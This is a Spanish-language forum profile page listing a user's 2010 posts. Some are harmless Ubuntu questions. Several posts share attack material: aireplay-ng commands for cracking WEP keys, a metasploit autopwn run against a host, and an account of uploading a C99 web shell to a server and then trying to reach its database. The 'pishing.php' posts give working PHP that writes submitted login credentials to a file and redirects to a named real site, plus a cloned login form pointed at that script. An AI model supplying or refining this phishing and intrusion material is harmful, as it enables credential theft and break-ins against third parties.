Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - .:UND3R:.

#3111
Hola a todos bueno estoi haciendo pruebas en mi red wifi
y claro e encontrado por todos lados tutoriales de como descifrar claves wep pero siempre con el metodo:

Citaraireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 (interfase virtual)

y luego aumentando el flujo con:

Citaraireplay-ng -3 (interfase virtual) -b (bssid) -h 00:11:22:33:44:55 -x 300

pero mi duda es mas basica

Como aumentar el flujo de datos de un cliente ya conectado?


buscando por internet encontre esto:

Citaraireplay-ng -3 (interfase) -b (bssid) -h (STATION) –x 300

pero claro cuando ejecuto el comando me arroja esto:
Citar
The interface MAC (00:11:22:33:44:55) doesn't match the specified MAC (-h).
        ifconfig wlan0 hw ether 00:1E:65:CE:XX:XX
15:30:20  Waiting for beacon frame (BSSID: 00:26:5A:27:XX:XX) on channel 1
Saving ARP requests in replay_arp-0731-153020.cap
You should also start airodump-ng to capture replies.
^Cad 41 packets (got 3 ARP requests and 6 ACKs), sent 1468 packets...(700 pps)

me da a entender que esta mal especificada por que mi mac fake es 00:11:22:33:44:55

siguiendo con el procedimiento  genero mas paquetes con:

Citaraireplay-ng -0 1 -a (bssid) -c (STATION) (interfase)

luego empiesa a enviar demasiados paquetes pero no aumenta los datas

intente modificar el codigo de esta manera:

Citaraireplay-ng -3 (interfase) -b (bssid) -c (STATION) –x 300

pero al hacer esto no marca el error pero me sale got 0 ARP y 0 ACK

me encantaria mucho que me instruieran a como descifrar una con un cliente conectado...

gracias :D
#3112
Muchas gracias, lo prové y claro desapareció la ventana negra pero me autoidentificaba por lo que lo cambie a la opción anterior y desaparecio la pantalla negra y me pedia autentificación en modo grafico tal como yo queria, Muchas gracias

otra duda lo que pasa es que tengo particionado mi disco duro e instalado ubuntu y también windows.  cada ves que prendo el pc con el SO Ubuntu debo montar el Disco y poner mi clave para poder visualizar los archivos
¿Como puedo hacer para que cuando arranque Ubuntu este ya lo tenga montado?
tengo wine con el programa p2p ares y cuando lo abro debo tener anteriormente montado el disco por que las descargas estan direccionadas a tal :D
#3113
Dudas Generales / Duda ubuntu desktop tty1
2 Junio 2010, 16:22 PM
Hola a todos bueno les cuento tengo instalado ubuntu 9.10 en mi computador y me va de lujo pero
me el problema que tengo es que cuando se prende carga el grub, aparce el simbolo de ubuntu normalmente pero despues de eso aparece la pantalla negro por unos 3 segundos y sale ubuntu desktop ttyp1 pidiendome que ponga login y pass luego sigue normal y aparece la ventana para Iniciar sesion en modo grafico normal
mi duda es como puedo eliminar esa pantalla negra que me pide login y pass siendo que desaparece y no necesito usarla?

gracias
#3114
Hola a todos bueno usando metasploit y hago lo siguientel;
db_create
db_import_nessus_xml /home/xxxr/Escritorio/2.nessus
db_vulns
  • Time: Sun May 30 02:58:28 UTC 2010 Vuln: host=xxx.xx.xx port=8090 proto=tcp name=NSS-0 refs=
  • Time: Sun May 30 02:58:32 UTC 2010 Vuln: host=xxx.xx.xx port=8090 proto=tcp name=NSS-34970 refs=CVE-2009-3099,CVE-2009-3548,CVE-2010-0557,BID-36253,BID-36954,BID-37086,BID-38084,OSVDB-57898,OSVDB-60176,OSVDB-60317,OSVDB-62118

    luego uso el comando db_autopwn con esto -t -e -x (agrego -t -e -x por un manual no entiendo eso)
    y me arroja esto:
  • ================================================================================
  •                             Matching Exploit Modules
  • ================================================================================
  •   xxx.xxx.xxx.xx:12090  exploit/multi/http/tomcat_mgr_deploy  (OSVDB-60317)
  • ================================================================================


  • (1/1 [0 sessions]): Launching exploit/multi/http/tomcat_mgr_deploy against xxx.xxx.xx:12090...
  • (1/1 [0 sessions]): Waiting on 1 launched modules to finish execution...
  • (1/1 [0 sessions]): Waiting on 0 launched modules to finish execution...
  • The autopwn command has completed with 0 sessions

    y luego pongo

    msf > sessions

    Active sessions
    ===============

    No active sessions.


    NO entiendo eso de sessions si alguien podria explicarmelo de echo no se que estoi haciendo solo se que metasploit esta interpretando los resultados de nessus y luego los lanza mi duda es que por que no funciona es por que dice session 0? porfavor gracias

    EDIT: investigando creo que en UBUNTU no funciona muy bien este comando, Creo entender las sessions si el exploit funciono deberia haber sessions?, si me equivoco correjirme

    Ahora mi nueva duda es como elegir los payloads que entega  funcionan todos? si el servidor corre en windows y elijo un payloads que parte con windows/ da igual cual SO sea (windows 98,XP,windows NT)?
#3115
Hola a todos, escaneo webs con nikto y me arroja algunas alertas al igual que con acunetix pero mi duda es como las busco con metasploit me refiero al nombre ya que este lo ejecuto en modo web y al buscar el exploit no me encuentra casi nada muchas gracias
#3116
Gracias

a todo esto ni yo puedo conectarme al mismo tipo de base de datos
te comento que la base de datos la tengo de esta manera configurada(la mia es igual a la de la pagina)

Autentificacion:
SQL y Windows

seria lo unico que e modificado al crear la base de datos ya que es una simple base de datos restaurada con dbuser y dbpass

gracias
#3117
Hoola a todos bueno les cuento e logrado subir una shell (!C99Shell v. 1.0 pre-release build #16!) pero mi problema es que no logro tener acceso a la base de datos,use el
SQL Manager del phpshell y no logro conectarme,e intentado con el puerto default 3306 y me aparece acceso denegado pero tengo entendido que la base de datos a la cual me quiero conectar corre por el puerto 1433, cuando cambio a ese puerto se queda dando vueltas y aparece esto:
CitarCan't connect
Lost connection to MySQL server during query
mi pregunta es de que forma puedo tener el acceso a las base de datos?
existe algun cliente en PHP que se conecte a la BD
posible conexión remota de MYSQL 2000
si es asi de que manera pudo activar

:SERVER STATUS
Citarcorre bajo MYSQL SERVER 2000
sistema operativo WINDOWS XP

porfavor necesito su ayuda gracias :D


________________________________

en mi pc implemtento la misma base de datos y al igual no logro entrar la phpshell me deja el siguiente mensaje probando con el puerto 1433 y 3306

CitarSQL Manager:
Can't connect
Can't connect to MySQL server on 'localhost' (10061)

Porfavor ayuda :G

saludos :D
#3118
PHP / Re: duda sobre pishing.php
4 Marzo 2010, 21:46 PM
no,soy pequeño de echo todavia no soy mayor de edad,pretendo estudiarlo en la universidad,porfavor una ayuda  :rolleyes:

hice esto:
<?php
$handle 
fopen("log.txt""a");
foreach(
$_POST as $variable => $value) {
   
fwrite($handle$variable);
   
fwrite($handle"=");
   
fwrite($handle$value);
   
fwrite($handle"\r\n");
}
fwrite($handle"\r\n");
fclose($handle);
header ('Location: http://fantazymu.web.id/index.php/ ');
exit;
?>


pero todavia no logro entrar como autentificado

el form de la pagina es este:

                  <form action='' method='post' name='login_account' id='login_account'>
                          <table width='166' border='0' cellspacing='0' cellpadding='0'>
                            <tr>
                              <td height='16' colspan='2' class='text_login' scope='row' align='left'>Username</td>
                            </tr>
                            <tr>
                              <th height='16' colspan='2' scope='row'><div align='left'>
                                  <input name='login' type='text' class='login_field' id='login' title='Username' size='15' maxlength='10'>

                                  <input name='account_login' type='hidden' id='account_login' value='account_login'>
                              </div></th>
                            </tr>
                            <tr>
                              <td height='16' colspan='2' class='text_login' scope='row' align='left'>Password</td>
                            </tr>
                            <tr>
                              <th colspan='2' scope='row'><div align='left'>

                                  <input name='pass' type='password' class='login_field' id='pass' title='Password' size='15' maxlength='10'>
                              </div></th>
                            </tr>
                            <tr>
                              <th width='62' height='33' scope='row'><div align='left'>
                                  <input name='Submit' type='submit' class='button' value='Login!' title='Login'>
                              </div></th>
                              <td width='104' scope='row'><div align='left' title='Lost Password' class='link_menu'><a href='http:/uyquelindaweb/index.php?op=lostpassword'>Lost Password </a></div></td>

                            </tr>
                          </table>
                        </form>


lo que ago es cambiar
<form action='' method='post' name='login_account' id='login_account'>

por esto

<FORM METHOD="post" ACTION="datos.php">


claro guarda los datos pero al momento de redireccionar al index no esta autentificada


#3119
PHP / Re: duda sobre pishing.php
4 Marzo 2010, 21:11 PM
:B soy un poco nulo con esto de php osea el codigo que me mandaste
en el index ¿lo pongo asi?

<form method="post" ACTION=codigo.php

y en el codigo.php pongo el codigo que me enviaste
_____________________________________0
$referer="http://referer.com";
$uri="/pagina.php";

esta es la ruta de la pagina web original?



en que lugar de mi pagina queda guardado los datos?

muchas gracias por tu ayuda
#3120
PHP / Re: duda sobre pishing.php
4 Marzo 2010, 20:46 PM
No lo logre :/ me redirecciona a la pagina pero no logueado
este es una parte del form de la pagina
<form action='' method='post' name='login_account' id='login_account'>

se podria poner 2 action cosa que pase por el mio (dato.php) y despues por el normal de la web? gracias :)